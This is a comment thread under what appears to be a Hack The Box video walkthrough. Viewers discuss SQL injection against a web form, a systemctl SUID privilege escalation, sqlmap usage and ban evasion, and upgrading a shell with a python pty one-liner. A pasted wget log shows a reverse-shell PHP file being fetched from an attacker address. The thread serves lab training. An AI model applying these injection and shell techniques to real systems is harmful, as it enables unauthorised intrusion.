around 25:00 In burp repeater, we can use autoscrolling when matches. That directly go to the searching text. Instead of scrolling or hitting next. By Clicking + sign.
Got my OSCP exam tomorrow and I'm so glad I decided to do an IppSec binge-watch the day before! SQLi is the one thing I'm concerned about (especially LFI/RCE via SQLi) but I learned a LOT from this video!! Thank you sir!
I believe the reason why the systemctl exploit wasn't working from the /tmp directory, is that modern Linux systems started implementing separate/tmp directories for each user, as a security measure. In this case, the root user was probably referring to its /tmp dir, and hence not seeing the files being placed by user pepper in their /tmp dir. That's why it's better to use a directory accessible by both users "e.g. /dev/shm", when attempting an escalation.
For the systemctl in GTFObins, I believe that first command sets SUID for the systemctl binary. No idea why they include it there, if you can set it you're already root xD A little trick, since you manually searched for 'price' in burp all the time: to the left of the search field you can set it to autoscroll to the search value on every reload.
When you see he is hitting a character limit in the field at 31:00 and you want so bad to help him from spinning in circles. Dudes a legend though. Anyone wanting to do all the steps do a [from+information_Schema.TABLES+where+TABLE_SCHEMA+=+'mysql'] and you see users and can drill down from there.
Nice video dude Thank you for the explanation, but I have a question, why did you fuzz the website instead of using sqlmap, Because when you added '--- I suspected blind sql injection according to the output that you got
I don't fully remember this box, but generally i like to fuzz the output prior to SQLMap. I go from simplest -> most complex. I consider single character fuzzes super simple, I'm just looking at how a field behaves to certain characters. SQLMap is a bit more complex, as its attempting to identify language its coded in, the database software, and if types of injections its vulnerable to. You'll rarely see me just blindly launch SQLMap unless there's another task I want to do and am just throwing SQLMap in the background. However, SQLMap will crash servers (even one in OffShore!) so use with care.
@@ippsec I read a write up somewhere and the user bypassed the the risk of getting banned for 90 sec by adding user-agent to his sqlmap but he didn't explain what has happened can you please demonstrate how he managed to bypass the banking through adding user-agent ?
@@Haxr-dq6wt If you use SQLMap the way I generally show, by copying the HTTP Request from BURP to a File then using SQLMAP with the HTTP Request (-r). It will automatically the UserAgent of your web browser and you don't need to worry about it. If you want to learn more, just use the --proxy option in SQLMAP to send it through burp and look at the HTTP Requests to see the difference when you run `sqlmap ` and `sqlmap -r `. I've shown this in a video before but not sure what one.
I got initial shell by calling "--os-shell" on sqlmap, but I guess this is the real way to do it ;p That trick with python to get a proper shell is amazing.... what doe the "stty raw -echo" do?
It allows for tab completion in the shell. First, run the : python -c 'import pty:pty.spawn("/bin/bash")' --or python3 depending on the box-- then ctrl z (to background) stty raw -echo, fg (enter... to bring it back to the foreground) then enter enter to see your prompt again in the new & improved shell.
Anyone running into this problem? : at 59:00When trying to hit the URL with the rev shell, --2020-07-03 19:50:46-- 10.10.14.30/rev.php Connecting to 10.10.14.30:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5493 (5.4K) [application/octet-stream] Saving to: 'rev.php.1' 0K ..... 100% 6.56M=0.001s 2020-07-03 19:50:47 (6.56 MB/s) - rev.php.1' saved [5493/5493] Also, I noticed two requests are made every time.
Can confirm that I also had to reset the session ID when exploiting phpmyadmin and trying a new php one liner. As shown in the video,it's a spot where you can potentially waste a lot of time if you make a syntax error, correct it, and then forget to reset the session.
@@Rezurrektz Unfortunately, the same thing is true for the CPU too, not just the GPU. So it's worse than a "budget" processor. Anyways, that's a good idea. Thank you!
@@mr.fakeman4718 Majority of the hashes on HTB are weak on purpose. Just don't crack it within a VM and the cracking stuff is more than do-able. I just do not want to record my Host OS's screen incase notifications or something pops up.
@@ippsec Understood. Thank you very much! I've just attended a sysadmin course because it gives me credits. Only gives CCNA, but at least I'm one of the smartest ppl. Btw what was your way of becoming that expert/omniscient? Sorry if somebody asked this before, just couldn't find a comment about this.
Hi ippsec, i have a question: How can i see php file in a website , because when i click on nothing work, also i dont have permission to see that, permission denide. I have that in wp content ! Thx
Thanks for showing the different methods for newbies. Simply wonderful experience to watch your walk throughs.
around 25:00 In burp repeater, we can use autoscrolling when matches. That directly go to the searching text. Instead of scrolling or hitting next. By Clicking + sign.
you put /var/ww/html instead of www at 35:57 .
But the way you handle the box, its really best ! you are beyond the imagination .
Awsom solution !
Got my OSCP exam tomorrow and I'm so glad I decided to do an IppSec binge-watch the day before! SQLi is the one thing I'm concerned about (especially LFI/RCE via SQLi) but I learned a LOT from this video!! Thank you sir!
Did you pass?!
@@raycharles6240 Yes :)
@@TheCryptonian Congratulations
Easiest box on HTB ..
And kudos to this guy for his continues effort to made these priceless videos available to us.
Great video!
IppSec, the man that never copy-paste
I believe the reason why the systemctl exploit wasn't working from the /tmp directory, is that modern Linux systems started implementing separate/tmp directories for each user, as a security measure. In this case, the root user was probably referring to its /tmp dir, and hence not seeing the files being placed by user pepper in their /tmp dir.
That's why it's better to use a directory accessible by both users "e.g. /dev/shm", when attempting an escalation.
Thanks man!! I made a tmp dir in pepper's home and then linked it! Finally it worked!!
I have so many nice things to say about you, IppSec. You are a living LEGEND.
I loved the section on crafting SQLi around 16:00 -- thanks so much!
Wow epic! I learn a lot from this. More videos like this please 👍
Thanks again for the wonderful video man. You're beyond awesome at this point.
Thanks for the vid, really enjoyed this one
For the systemctl in GTFObins, I believe that first command sets SUID for the systemctl binary. No idea why they include it there, if you can set it you're already root xD
A little trick, since you manually searched for 'price' in burp all the time: to the left of the search field you can set it to autoscroll to the search value on every reload.
that is just for reproducing the stuff you wanna try.
if you want to try thr SUID misconfig for systemctl, you set SUID bit to systemctl and try it.
I learn so much from these videos ! thank you for sharing the knowledge .
Could you do a tutorial on the hashcat how to use it how u did in 33:14
thanks a lot for doing this, it teaches me SQLI injection :)
When you see he is hitting a character limit in the field at 31:00 and you want so bad to help him from spinning in circles. Dudes a legend though. Anyone wanting to do all the steps do a [from+information_Schema.TABLES+where+TABLE_SCHEMA+=+'mysql'] and you see users and can drill down from there.
IppSec you make my Saturdays. 👍
Laudanum stands for liquid morphine that was used back in the 1910 to 1940 I reckon. Them veterans never came back the same.
And i just used sqlmap to do it for me... thats why i love how u do it ik keep learning!
Nice video dude
Thank you for the explanation, but I have a question, why did you fuzz the website instead of using sqlmap,
Because when you added '--- I suspected blind sql injection according to the output that you got
I don't fully remember this box, but generally i like to fuzz the output prior to SQLMap. I go from simplest -> most complex. I consider single character fuzzes super simple, I'm just looking at how a field behaves to certain characters.
SQLMap is a bit more complex, as its attempting to identify language its coded in, the database software, and if types of injections its vulnerable to.
You'll rarely see me just blindly launch SQLMap unless there's another task I want to do and am just throwing SQLMap in the background. However, SQLMap will crash servers (even one in OffShore!) so use with care.
@@ippsec I read a write up somewhere and the user bypassed the the risk of getting banned for 90 sec by adding user-agent to his sqlmap but he didn't explain what has happened can you please demonstrate how he managed to bypass the banking through adding user-agent
?
@@Haxr-dq6wt If you use SQLMap the way I generally show, by copying the HTTP Request from BURP to a File then using SQLMAP with the HTTP Request (-r). It will automatically the UserAgent of your web browser and you don't need to worry about it. If you want to learn more, just use the --proxy option in SQLMAP to send it through burp and look at the HTTP Requests to see the difference when you run `sqlmap ` and `sqlmap -r `. I've shown this in a video before but not sure what one.
Could someone pls explain to me why we dont need to use a ' to break out of the select statement?
I got initial shell by calling "--os-shell" on sqlmap, but I guess this is the real way to do it ;p
That trick with python to get a proper shell is amazing.... what doe the "stty raw -echo" do?
It allows for tab completion in the shell. First, run the : python -c 'import pty:pty.spawn("/bin/bash")' --or python3 depending on the box-- then ctrl z (to background) stty raw -echo, fg (enter... to bring it back to the foreground) then enter enter to see your prompt again in the new & improved shell.
@@user-bg9xo2xv6v thanks man!
Thank you for using manual sql injections learning lots with your videos
Anyone running into this problem? : at 59:00When trying to hit the URL with the rev shell,
--2020-07-03 19:50:46-- 10.10.14.30/rev.php
Connecting to 10.10.14.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'rev.php.1'
0K ..... 100% 6.56M=0.001s
2020-07-03 19:50:47 (6.56 MB/s) - rev.php.1' saved [5493/5493]
Also, I noticed two requests are made every time.
bro use "O" instead of "o" in wget sql query .. hehe i did the same and just noticed.. XD
@@karanluniyal3053 Thanks brother
Where can I get these hack the box files ? And do I run them say on a raspberry pi
personalchannle hackthebox.eu.
You inspire me and properly others to be a pen tester have you got any advice ?
1 question how do you split your terminal into two ?
@@personalchannle9159 Look up "tmux"
@@personalchannle9159 He uses tmux and has a video about it that goes over what it does.
First time you did LOAD_FILE you only had 2 w's /var/ww/html
Can confirm that I also had to reset the session ID when exploiting phpmyadmin and trying a new php one liner. As shown in the video,it's a spot where you can potentially waste a lot of time if you make a syntax error, correct it, and then forget to reset the session.
Awesome video!
Great as always.
I will purchase a kraken-like machine then return to HTB.
With an ancient AMD, I hardly can do anything.
Just use Crackstation for ur HTB hash cracks
@@Rezurrektz Unfortunately, the same thing is true for the CPU too, not just the GPU. So it's worse than a "budget" processor. Anyways, that's a good idea. Thank you!
@@mr.fakeman4718 Majority of the hashes on HTB are weak on purpose. Just don't crack it within a VM and the cracking stuff is more than do-able. I just do not want to record my Host OS's screen incase notifications or something pops up.
@@ippsec Understood. Thank you very much! I've just attended a sysadmin course because it gives me credits. Only gives CCNA, but at least I'm one of the smartest ppl. Btw what was your way of becoming that expert/omniscient? Sorry if somebody asked this before, just couldn't find a comment about this.
Is htb for free or I should pay to play ??
Djebbar ANON it’s free mate, there’s is premium version too
@@mohamedzumri4305
What's the differences bettwen the free version and the premium version
@@djebbaranon5892 Premium you can hack older boxes, you also get on less crowded servers, its easily with the $12 or whatever it is
@@Daniel-ng8fi
And what's about the free version ??
I can't hack old boxes like pocorn?
@@djebbaranon5892 I don't believe so, or maybe there is only a few you can, but VIP gets you all of them,
Instead of doing the union select 1,2,3,4, and so on i think you can just use the order by >>and the number you want to test
Perfect!
Hi ippsec, i have a question:
How can i see php file in a website , because when i click on nothing work, also i dont have permission to see that, permission denide.
I have that in wp content !
Thx
plushoom , yes , when i click to php file , come out blank page , i cant see the content of php file.
Copyright it’s normal the php code is being process by the server so u can’t see the code
thank you :)
Can I ever be able hack like you? 🥴🥴
Tnx alot lot lot lot lot